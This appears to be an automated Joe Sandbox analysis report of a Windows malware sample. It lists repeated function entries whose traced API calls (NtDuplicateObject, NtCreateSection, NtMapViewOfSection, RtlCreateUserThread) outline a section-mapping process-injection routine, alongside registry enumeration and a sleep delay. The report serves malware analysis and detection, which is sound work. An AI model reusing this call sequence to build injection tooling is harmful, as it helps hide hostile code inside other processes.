                                                                                                                                      execution_graph 2939 4019c0 2940 4019e1 2939->2940 2942 4019f2 2940->2942 2943 401597 2940->2943 2944 4015a6 2943->2944 2945 401643 NtDuplicateObject 2944->2945 2951 40175f 2944->2951 2946 401660 NtCreateSection 2945->2946 2945->2951 2947 4016e0 NtCreateSection 2946->2947 2948 401686 NtMapViewOfSection 2946->2948 2950 40170c 2947->2950 2947->2951 2948->2947 2949 4016a9 NtMapViewOfSection 2948->2949 2949->2947 2952 4016c7 2949->2952 2950->2951 2953 401716 NtMapViewOfSection 2950->2953 2951->2942 2952->2947 2953->2951 2954 40173d NtMapViewOfSection 2953->2954 2954->2951 2955 402ec9 2956 402ec2 2955->2956 2961 402f16 2956->2961 2962 402f56 2956->2962 2963 4023b0 2956->2963 2958 402f06 2958->2962 2973 40249e 2958->2973 2961->2962 2982 40197f 2961->2982 2965 4023b9 2963->2965 2964 4023a1 2964->2958 2965->2964 2988 40250f 2965->2988 2967 402626 NtOpenKey 2971 4024f6 2967->2971 2968 402726 NtClose 2968->2971 2969 4026bd NtEnumerateKey 2969->2971 2970 4026e3 NtEnumerateKey 2970->2971 2971->2967 2971->2968 2971->2969 2971->2970 2972 402501 2971->2972 2972->2958 2974 40249f 2973->2974 2975 40250f 8 API calls 2974->2975 2980 4024f6 2975->2980 2976 402501 2976->2961 2977 402626 NtOpenKey 2977->2980 2978 402726 NtClose 2978->2980 2979 4026bd NtEnumerateKey 2979->2980 2980->2976 2980->2977 2980->2978 2980->2979 2981 4026e3 NtEnumerateKey 2980->2981 2981->2980 2983 40198e 2982->2983 2984 4019c6 Sleep 2983->2984 2985 4019e1 2984->2985 2986 401597 7 API calls 2985->2986 2987 4019f2 2985->2987 2986->2987 2987->2962 2989 402510 2988->2989 2991 40273a 2989->2991 2997 402600 2989->2997 2991->2971 2992 402626 NtOpenKey 2996 40252b 2992->2996 2993 402726 NtClose 2993->2996 2994 4026bd NtEnumerateKey 2994->2996 2995 4026e3 NtEnumerateKey 2995->2996 2996->2991 2996->2992 2996->2993 2996->2994 2996->2995 3003 402601 2997->3003 2998 402626 NtOpenKey 2998->3003 2999 402726 NtClose 2999->3003 3000 40273a 3000->2996 3001 4026bd NtEnumerateKey 3001->3003 3002 4026e3 NtEnumerateKey 3002->3003 3003->2998 3003->2999 3003->3000 3003->3001 3003->3002 3068 40198d 3069 40198e 3068->3069 3070 4019c6 Sleep 3069->3070 3071 4019e1 3070->3071 3072 401597 7 API calls 3071->3072 3073 4019f2 3071->3073 3072->3073 3074 402e90 3075 402e78 3074->3075 3076 4023b0 12 API calls 3075->3076 3080 402f16 3075->3080 3081 402f56 3075->3081 3077 402f06 3076->3077 3079 40249e 12 API calls 3077->3079 3077->3081 3078 40197f 8 API calls 3078->3081 3079->3080 3080->3078 3080->3081 3082 402595 3087 4025bd 3082->3087 3083 402626 NtOpenKey 3083->3087 3084 402726 NtClose 3084->3087 3085 4026bd NtEnumerateKey 3085->3087 3086 4026e3 NtEnumerateKey 3086->3087 3087->3083 3087->3084 3087->3085 3087->3086 3088 40273a 3087->3088 3109 4015a2 3110 4015a6 3109->3110 3111 401643 NtDuplicateObject 3110->3111 3117 40175f 3110->3117 3112 401660 NtCreateSection 3111->3112 3111->3117 3113 4016e0 NtCreateSection 3112->3113 3114 401686 NtMapViewOfSection 3112->3114 3116 40170c 3113->3116 3113->3117 3114->3113 3115 4016a9 NtMapViewOfSection 3114->3115 3115->3113 3118 4016c7 3115->3118 3116->3117 3119 401716 NtMapViewOfSection 3116->3119 3118->3113 3119->3117 3120 40173d NtMapViewOfSection 3119->3120 3120->3117 3135 402fa5 3136 402f2f 3135->3136 3138 402faa 3135->3138 3137 40197f 8 API calls 3136->3137 3139 402f56 3137->3139 3008 402c6c 3009 402c24 3008->3009 3009->3008 3010 4023b0 12 API calls 3009->3010 3014 402f16 3009->3014 3015 402be2 3009->3015 3011 402f06 3010->3011 3013 40249e 12 API calls 3011->3013 3011->3015 3012 40197f 8 API calls 3012->3015 3013->3014 3014->3012 3014->3015 3016 40246e 3018 402468 3016->3018 3017 40248d 3018->3016 3018->3017 3019 40250f 8 API calls 3018->3019 3024 4024f6 3019->3024 3020 402626 NtOpenKey 3020->3024 3021 402726 NtClose 3021->3024 3022 4026bd NtEnumerateKey 3022->3024 3023 4026e3 NtEnumerateKey 3023->3024 3024->3020 3024->3021 3024->3022 3024->3023 3025 402501 3024->3025 3004 402ffc 3005 40313f 3004->3005 3006 403026 3004->3006 3006->3005 3007 4030e1 RtlCreateUserThread NtTerminateProcess 3006->3007 3007->3005 3204 4024bc 3205 4024bf 3204->3205 3206 40250f 8 API calls 3205->3206 3211 4024f6 3206->3211 3207 402626 NtOpenKey 3207->3211 3208 402726 NtClose 3208->3211 3209 4026bd NtEnumerateKey 3209->3211 3210 4026e3 NtEnumerateKey 3210->3211 3211->3207 3211->3208 3211->3209 3211->3210 3212 402501 3211->3212

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00401597 Relevance: 10.7, APIs: 7, Instructions: 203nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 401597-4015c4 5 4015c7-4015ed call 401232 0->5 6 4015bb-4015c0 0->6 12 4015f2-4015f7 5->12 13 4015ef 5->13 6->5 15 401925-40192d 12->15 16 4015fd-40160e 12->16 13->12 15->12 21 401932-40195f 15->21 19 401923 16->19 20 401614-40163d 16->20 19->21 20->19 29 401643-40165a NtDuplicateObject 20->29 34 401970 21->34 35 401967-40196c 21->35 29->19 31 401660-401684 NtCreateSection 29->31 32 4016e0-401706 NtCreateSection 31->32 33 401686-4016a7 NtMapViewOfSection 31->33 32->19 37 40170c-401710 32->37 33->32 36 4016a9-4016c5 NtMapViewOfSection 33->36 34->35 38 401973-40197c call 401232 34->38 35->38 36->32 39 4016c7-4016dd 36->39 37->19 40 401716-401737 NtMapViewOfSection 37->40 39->32 40->19 42 40173d-401759 NtMapViewOfSection 40->42 42->19 45 40175f call 401764 42->45
                                                                                                                                      APIs
                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                      • Opcode ID: 4bd35a49a1b245d18956b9a677ee802fbaaf2513d6b9e69c058e48c39028dee8
                                                                                                                                      • Instruction ID: 85d8d5eeeb7c1a6f455d1051bc3e68dc495f37d080ff889bc09c670f702c8de1
                                                                                                                                      • Opcode Fuzzy Hash: 4bd35a49a1b245d18956b9a677ee802fbaaf2513d6b9e69c058e48c39028dee8
                                                                                                                                      • Instruction Fuzzy Hash: EC613DB5600245FFEB209F91CC49FAF7BB8EF85710F10412AF912BA1E5D6749901DB25
                                                                                                                                      Function 004015A2 Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 47 4015a2-4015a4 48 4015a6-4015c4 47->48 49 4015de-4015ed 47->49 54 4015c7-4015ed call 401232 48->54 55 4015bb-4015c0 48->55 50 4015f2-4015f7 49->50 51 4015ef 49->51 57 401925-40192d 50->57 58 4015fd-40160e 50->58 51->50 54->50 54->51 55->54 57->50 67 401932-40195f 57->67 65 401923 58->65 66 401614-40163d 58->66 65->67 66->65 76 401643-40165a NtDuplicateObject 66->76 81 401970 67->81 82 401967-40196c 67->82 76->65 78 401660-401684 NtCreateSection 76->78 79 4016e0-401706 NtCreateSection 78->79 80 401686-4016a7 NtMapViewOfSection 78->80 79->65 84 40170c-401710 79->84 80->79 83 4016a9-4016c5 NtMapViewOfSection 80->83 81->82 85 401973-40197c call 401232 81->85 82->85 83->79 86 4016c7-4016dd 83->86 84->65 87 401716-401737 NtMapViewOfSection 84->87 86->79 87->65 89 40173d-401759 NtMapViewOfSection 87->89 89->65 92 40175f call 401764 89->92
                                                                                                                                      APIs
                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                      • Opcode ID: 550af55b5c33a16d76ad9188aa3b48c23daf6e7e6acb27d056da92f91d001912
                                                                                                                                      • Instruction ID: a0af025894150f1e49885bea0be4db9ca11602f8d27e405362ed464290d16070
                                                                                                                                      • Opcode Fuzzy Hash: 550af55b5c33a16d76ad9188aa3b48c23daf6e7e6acb27d056da92f91d001912
                                                                                                                                      • Instruction Fuzzy Hash: 1A51FAB5900245BFEB208F91CC49FAF7BB8FF85710F10416AFA12BA2E5D6759941CB24
                                                                                                                                      Function 004015AE Relevance: 10.7, APIs: 7, Instructions: 172nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 94 4015ae-4015c4 99 4015c7-4015ed call 401232 94->99 100 4015bb-4015c0 94->100 106 4015f2-4015f7 99->106 107 4015ef 99->107 100->99 109 401925-40192d 106->109 110 4015fd-40160e 106->110 107->106 109->106 115 401932-40195f 109->115 113 401923 110->113 114 401614-40163d 110->114 113->115 114->113 123 401643-40165a NtDuplicateObject 114->123 128 401970 115->128 129 401967-40196c 115->129 123->113 125 401660-401684 NtCreateSection 123->125 126 4016e0-401706 NtCreateSection 125->126 127 401686-4016a7 NtMapViewOfSection 125->127 126->113 131 40170c-401710 126->131 127->126 130 4016a9-4016c5 NtMapViewOfSection 127->130 128->129 132 401973-40197c call 401232 128->132 129->132 130->126 133 4016c7-4016dd 130->133 131->113 134 401716-401737 NtMapViewOfSection 131->134 133->126 134->113 136 40173d-401759 NtMapViewOfSection 134->136 136->113 139 40175f call 401764 136->139
                                                                                                                                      APIs
                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                      • Opcode ID: aad48c6d88222827d76aa7652c6c796d7ddce7428490710ae29ddb02ebf74649
                                                                                                                                      • Instruction ID: d93687337549ecf3b3999b9eee4fb31f76edfbca6074550aabce6ce0329d43fa
                                                                                                                                      • Opcode Fuzzy Hash: aad48c6d88222827d76aa7652c6c796d7ddce7428490710ae29ddb02ebf74649
                                                                                                                                      • Instruction Fuzzy Hash: 3651E9B5900249BFEB208F91CC49FAF7BB8FF85710F10416AF912BA2E5D6749941CB64
                                                                                                                                      Function 004015B2 Relevance: 10.7, APIs: 7, Instructions: 168nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 141 4015b2-4015c4 144 4015c7-4015ed call 401232 141->144 145 4015bb-4015c0 141->145 151 4015f2-4015f7 144->151 152 4015ef 144->152 145->144 154 401925-40192d 151->154 155 4015fd-40160e 151->155 152->151 154->151 160 401932-40195f 154->160 158 401923 155->158 159 401614-40163d 155->159 158->160 159->158 168 401643-40165a NtDuplicateObject 159->168 173 401970 160->173 174 401967-40196c 160->174 168->158 170 401660-401684 NtCreateSection 168->170 171 4016e0-401706 NtCreateSection 170->171 172 401686-4016a7 NtMapViewOfSection 170->172 171->158 176 40170c-401710 171->176 172->171 175 4016a9-4016c5 NtMapViewOfSection 172->175 173->174 177 401973-40197c call 401232 173->177 174->177 175->171 178 4016c7-4016dd 175->178 176->158 179 401716-401737 NtMapViewOfSection 176->179 178->171 179->158 181 40173d-401759 NtMapViewOfSection 179->181 181->158 184 40175f call 401764 181->184
                                                                                                                                      APIs
                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                      • Opcode ID: 8f1b04596c891638e987061b4fd14cd6f2842466c9f73f2235a240237ce973bd
                                                                                                                                      • Instruction ID: e724d2045ade5056ad904edc052e52f28ed36ddcc1604857e4509157ba9d4460
                                                                                                                                      • Opcode Fuzzy Hash: 8f1b04596c891638e987061b4fd14cd6f2842466c9f73f2235a240237ce973bd
                                                                                                                                      • Instruction Fuzzy Hash: 4951F8B5900249BFEB208F91CC48FAF7BB8FF85710F10416AFA11BA2E5D6749941CB24
                                                                                                                                      Function 004015B5 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 186 4015b5-4015ed call 401232 194 4015f2-4015f7 186->194 195 4015ef 186->195 197 401925-40192d 194->197 198 4015fd-40160e 194->198 195->194 197->194 203 401932-40195f 197->203 201 401923 198->201 202 401614-40163d 198->202 201->203 202->201 211 401643-40165a NtDuplicateObject 202->211 216 401970 203->216 217 401967-40196c 203->217 211->201 213 401660-401684 NtCreateSection 211->213 214 4016e0-401706 NtCreateSection 213->214 215 401686-4016a7 NtMapViewOfSection 213->215 214->201 219 40170c-401710 214->219 215->214 218 4016a9-4016c5 NtMapViewOfSection 215->218 216->217 220 401973-40197c call 401232 216->220 217->220 218->214 221 4016c7-4016dd 218->221 219->201 222 401716-401737 NtMapViewOfSection 219->222 221->214 222->201 224 40173d-401759 NtMapViewOfSection 222->224 224->201 227 40175f call 401764 224->227
                                                                                                                                      APIs
                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                      • Opcode ID: eb3fe8fbd6bccc29ca7bf92f4fff330b19a922bc50cdef00e3920239153ef05c
                                                                                                                                      • Instruction ID: 05886196e08d4e85f5453255f8ae9807988dcabdd8a0f4b981ab3c1fc65c3876
                                                                                                                                      • Opcode Fuzzy Hash: eb3fe8fbd6bccc29ca7bf92f4fff330b19a922bc50cdef00e3920239153ef05c
                                                                                                                                      • Instruction Fuzzy Hash: B551F9B5900249BFEB208F91CC48FAFBBB8FF85710F104169FA11BA2A5D7749945CB24
                                                                                                                                      Function 004015C9 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 229 4015c9-4015ed call 401232 233 4015f2-4015f7 229->233 234 4015ef 229->234 236 401925-40192d 233->236 237 4015fd-40160e 233->237 234->233 236->233 242 401932-40195f 236->242 240 401923 237->240 241 401614-40163d 237->241 240->242 241->240 250 401643-40165a NtDuplicateObject 241->250 255 401970 242->255 256 401967-40196c 242->256 250->240 252 401660-401684 NtCreateSection 250->252 253 4016e0-401706 NtCreateSection 252->253 254 401686-4016a7 NtMapViewOfSection 252->254 253->240 258 40170c-401710 253->258 254->253 257 4016a9-4016c5 NtMapViewOfSection 254->257 255->256 259 401973-40197c call 401232 255->259 256->259 257->253 260 4016c7-4016dd 257->260 258->240 261 401716-401737 NtMapViewOfSection 258->261 260->253 261->240 263 40173d-401759 NtMapViewOfSection 261->263 263->240 266 40175f call 401764 263->266
                                                                                                                                      APIs
                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                      • Opcode ID: ea96f037bf94ea02d19f6c63c086c7fff38af85363d4889041e369385c3c27e7
                                                                                                                                      • Instruction ID: ef1b3f988cfa4bb2a22b23b9c3e523de7926394e29e71cf52b4e6543f7eacfea
                                                                                                                                      • Opcode Fuzzy Hash: ea96f037bf94ea02d19f6c63c086c7fff38af85363d4889041e369385c3c27e7
                                                                                                                                      • Instruction Fuzzy Hash: 345117B5900249BFEB208F91CC49FEFBBB8FF85B10F100159FA11AA2A5D7749941CB24
                                                                                                                                      Function 004015C6 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 268 4015c6-4015ed call 401232 275 4015f2-4015f7 268->275 276 4015ef 268->276 278 401925-40192d 275->278 279 4015fd-40160e 275->279 276->275 278->275 284 401932-40195f 278->284 282 401923 279->282 283 401614-40163d 279->283 282->284 283->282 292 401643-40165a NtDuplicateObject 283->292 297 401970 284->297 298 401967-40196c 284->298 292->282 294 401660-401684 NtCreateSection 292->294 295 4016e0-401706 NtCreateSection 294->295 296 401686-4016a7 NtMapViewOfSection 294->296 295->282 300 40170c-401710 295->300 296->295 299 4016a9-4016c5 NtMapViewOfSection 296->299 297->298 301 401973-40197c call 401232 297->301 298->301 299->295 302 4016c7-4016dd 299->302 300->282 303 401716-401737 NtMapViewOfSection 300->303 302->295 303->282 305 40173d-401759 NtMapViewOfSection 303->305 305->282 308 40175f call 401764 305->308
                                                                                                                                      APIs
                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                      • Opcode ID: a2f322119c05af17b4901faaf714ff9b7bf9a3c80b83fc2f3d91b8ffa7827192
                                                                                                                                      • Instruction ID: 60ad09eed729309f4eedb2a363b86104ae123941a7c17f9052a08614a1eb4cc1
                                                                                                                                      • Opcode Fuzzy Hash: a2f322119c05af17b4901faaf714ff9b7bf9a3c80b83fc2f3d91b8ffa7827192
                                                                                                                                      • Instruction Fuzzy Hash: 8051E9B5900249BFEB208F91CC49FEFBBB8FF85B10F104159F911BA2A5D6749945CB24
                                                                                                                                      Function 00402600 Relevance: 6.1, APIs: 4, Instructions: 128nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
